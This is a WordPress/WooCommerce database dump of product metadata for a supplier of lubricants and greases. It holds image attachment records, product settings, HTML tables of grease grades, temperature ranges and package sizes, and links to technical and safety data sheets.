INSERT INTO `wp_postmeta` VALUES (8236, 851, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4288;s:6:"height";i:2848;s:4:"file";s:33:"2016/08/shutterstock_92739160.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_92739160-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_92739160-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_92739160-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_92739160-1600x1063.jpg";s:5:"width";i:1600;s:6:"height";i:1063;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_92739160-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_92739160-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_92739160-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_92739160-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (8237, 850, '_thumbnail_id', '851'); 
INSERT INTO `wp_postmeta` VALUES (8238, 850, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8239, 850, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8240, 842, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8241, 842, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (8242, 842, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8243, 842, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8244, 842, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8245, 842, '317_default_editor', 'Pint, quart, gallon, 5 gallon. 55 gallon drum.'); 
INSERT INTO `wp_postmeta` VALUES (8246, 842, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8247, 842, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8248, 842, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8249, 842, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8250, 842, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8251, 842, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8252, 842, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8253, 842, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8254, 842, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8255, 842, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8256, 842, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8257, 842, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8258, 842, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8259, 842, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8260, 842, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8261, 842, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8262, 842, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8263, 842, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8264, 842, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8265, 842, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8266, 842, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (8267, 842, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8268, 842, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8269, 842, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (8270, 842, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8271, 842, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8272, 842, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8273, 842, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8274, 842, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (8275, 852, '_edit_lock', '1475592378:2'); 
INSERT INTO `wp_postmeta` VALUES (8276, 852, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (8277, 852, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8278, 852, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (8279, 852, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8280, 852, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="125"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">1 oz.</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8281, 852, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (8282, 852, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8283, 852, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8284, 852, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8285, 852, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8286, 852, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8287, 852, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8288, 852, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8289, 852, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8290, 852, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8291, 852, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8292, 852, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8293, 852, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8294, 852, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8295, 852, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8296, 852, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8297, 852, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8298, 852, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8299, 852, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8300, 852, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (8301, 852, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8302, 852, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8303, 852, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (8304, 852, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8305, 852, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8306, 852, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (8307, 852, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (8308, 852, '_ywtm_content_tab_description', '&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (8309, 852, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8310, 852, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8311, 852, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8312, 852, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8313, 852, '_product_image_gallery', '380,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (8314, 852, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8315, 852, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8338, 852, '_thumbnail_id', '692'); 
INSERT INTO `wp_postmeta` VALUES (8339, 852, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8340, 852, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8341, 854, '_wp_attached_file', '2016/08/222n.png'); 
INSERT INTO `wp_postmeta` VALUES (8342, 854, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1680;s:6:"height";i:911;s:4:"file";s:16:"2016/08/222n.png";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:16:"222n-340x340.png";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:9:"image/png";}s:6:"medium";a:4:{s:4:"file";s:16:"222n-800x434.png";s:5:"width";i:800;s:6:"height";i:434;s:9:"mime-type";s:9:"image/png";}s:12:"medium_large";a:4:{s:4:"file";s:16:"222n-768x416.png";s:5:"width";i:768;s:6:"height";i:416;s:9:"mime-type";s:9:"image/png";}s:5:"large";a:4:{s:4:"file";s:17:"222n-1600x868.png";s:5:"width";i:1600;s:6:"height";i:868;s:9:"mime-type";s:9:"image/png";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:16:"222n-250x250.png";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:9:"image/png";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:16:"222n-200x200.png";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:9:"image/png";}s:12:"shop_catalog";a:4:{s:4:"file";s:16:"222n-225x225.png";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:9:"image/png";}s:11:"shop_single";a:4:{s:4:"file";s:16:"222n-510x600.png";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:44;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (8347, 842, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (8348, 859, '_wp_attached_file', '2016/08/shutterstock_396576940.jpg'); 
INSERT INTO `wp_postmeta` VALUES (8349, 859, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:34:"2016/08/shutterstock_396576940.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_396576940-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_396576940-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_396576940-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_396576940-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_396576940-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_396576940-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_396576940-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_396576940-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (8350, 860, '_wp_attached_file', '2016/08/825.pdf'); 
INSERT INTO `wp_postmeta` VALUES (8351, 842, '318_custom_list_file', 'a:2:{s:32:"8c554c0e817a84b86238dd2e31aefe3b";a:3:{s:4:"name";s:8:"EPON 825";s:4:"file";s:68:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/825.pdf";s:4:"desc";s:12:"EPON 825 TDS";}s:32:"72a2e7d2ac5eab9425250c0cb021f827";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:20:"Product Overview TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (8352, 861, '_edit_lock', '1479929992:3'); 
INSERT INTO `wp_postmeta` VALUES (8353, 862, '_edit_lock', '1503069207:2'); 
INSERT INTO `wp_postmeta` VALUES (8354, 862, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (8355, 862, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8356, 862, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (8357, 862, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="2" width="426"><strong>LVP Grease Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">NLGI Consistency</td>\r\n<td style="text-align: center;">Grade 2</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Vapor Pressure</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Torr at 20°C</td>\r\n<td style="text-align: center;">-1.0 x 10^-13</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Torr at 200°C</td>\r\n<td style="text-align: center;">-1.0 x 10^-5</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">kPa at 20°C</td>\r\n<td style="text-align: center;">-1.0 x 10^-14</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">kPa at 200°C</td>\r\n<td style="text-align: center;">-1.0 x 10^-6</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Density, 25°C g/cc</td>\r\n<td style="text-align: center;">1.94</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8358, 862, '716_default_editor', '<ul>\r\n 	<li>Sealant or lubricant in vacuum systems</li>\r\n 	<li>High-temperature bearing</li>\r\n 	<li>Valve</li>\r\n 	<li>O-ring</li>\r\n 	<li>Oven conveyor chain and bearing grease</li>\r\n 	<li>Pressure relief valve lubricant</li>\r\n 	<li>Any use that requires high-temperature stability, low vapor pressure, or chemical inertness</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8359, 862, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8360, 862, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">1 oz.</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8361, 862, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8362, 862, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8363, 862, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8364, 862, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8365, 862, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8366, 862, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8367, 862, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8368, 862, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8369, 862, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8370, 862, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8371, 862, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8372, 862, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8373, 862, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8374, 862, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8375, 862, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8376, 862, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8377, 862, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8378, 862, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8379, 862, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8380, 862, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8381, 862, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (8382, 862, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8383, 862, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8384, 862, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (8385, 862, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8386, 862, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8387, 862, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8388, 862, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8389, 862, '_product_image_gallery', '378,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (8390, 862, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (8391, 863, '_wp_attached_file', '2016/08/shutterstock_22381852.jpg'); 
INSERT INTO `wp_postmeta` VALUES (8392, 863, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4368;s:6:"height";i:2912;s:4:"file";s:33:"2016/08/shutterstock_22381852.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_22381852-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_22381852-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_22381852-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_22381852-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_22381852-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_22381852-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_22381852-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_22381852-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (8393, 862, '_thumbnail_id', '863'); 
INSERT INTO `wp_postmeta` VALUES (8394, 862, '318_custom_list_file', 'a:2:{s:32:"74c39bcbd56bed019b91f42c7cb913f1";a:3:{s:4:"name";s:7:"LVP PDF";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/LVP-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}s:32:"d7a842819893c219a9bf6837d3962ae8";a:3:{s:4:"name";s:7:"LVP SDS";s:4:"file";s:68:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/LVP.pdf";s:4:"desc";s:17:"Safety Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (8395, 862, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8396, 862, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8397, 862, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (8398, 862, '_ywtm_title_tab_description', 'Description'); 
